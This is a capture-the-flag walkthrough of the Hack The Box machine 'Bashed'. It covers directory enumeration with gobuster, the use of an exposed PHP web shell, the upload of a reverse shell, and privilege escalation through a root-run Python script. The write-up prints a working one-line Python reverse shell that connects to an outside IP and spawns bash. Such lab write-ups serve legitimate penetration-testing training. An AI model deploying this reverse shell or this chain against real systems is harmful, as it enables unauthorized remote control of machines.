Bashed – Hack The Box

Overall Summary

Bashed is a Linux machine from Hack The Box that can be exploited through a web shell that is already hosted on the machine and gaining a reverse shell from it. The privilege escalation part consists in first becoming a different user to gain access to a specific folder and find a script that is being executed by root every minute and to edit it to get a root shell. Overall the machine is really simple to solve but yet a very good machine for people starting out pentesting.

Scanning and Enumeration

Running a full TCP scan with nmap returns the following information.

 

 

Bashed only had port 80 open and browsing to it displays a blog site looking at the only entry It talks about a PHP web shell that is implemented somewhere in the web service, so I used gobuster to look for directories and files containing the .php file extension.
root@kali:~# gobuster -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php Gobuster v1.4.1 OJ Reeves (@TheColonial) ===================================================== ===================================================== [+] Mode : dir [+] Url/Domain : http://10.10.10.68/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes : 200,204,301,302,307 [+] Extensions : .php ===================================================== /images (Status: 301) /uploads (Status: 301) /php (Status: 301) /css (Status: 301) /dev (Status: 301) /js (Status: 301) /config.php (Status: 200) /fonts (Status: 301)
Browsing to the /dev folder I was able to see twp php web shells.

 

 

Using one of the PHP web shells I was able to get command execution.

 

Exploitation

Using the web shell I was able to see that the uploads folder was writable and therefore I could upload a PHP reverse shell.

 

 

I uploaded a PHP reverse shell from Pentestmonkey using wget into the uploads folder.

 

 

To get a reverse shell  I browsed to the file from the browser and set up a netcat listener on port 443.

 

Post-Exploitation

The first thing I did before looking around for any other information was to get a TTY shell using Python.

 

 

Right out the back there was a folder named “scripts” which is not a default directory on a Linux system.

 

 

The current user didn’t have enough permissions to browse the folder as it was owned by the scriptmanager user but using the “sudo -l” command I was able to see that the “www-data” user was actually able to execute commands as the scriptmanager user without providing a password, so I executed a bash shell as the script manager.

 

 

Browsing to the scripts folder shows two files, a python script and a text file.

 

 

 

The Python script opens the file named test.txt and writes the message “testing 123!” and we can also see from the screenshot that the text file is owned by the root user, meaning that the script is being executed with root privileges, I also noticed that the test.txt file keeps being updated as the time from creation keeps changing about every minute, so I edited the Python script and placed a Python reverse shell, this is the one liner Python reverse shell script.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.30",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

 

 

I then set up a netcat listener on port 7777 and wait about a minute to get a reverse shell as the root user.

 

 
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments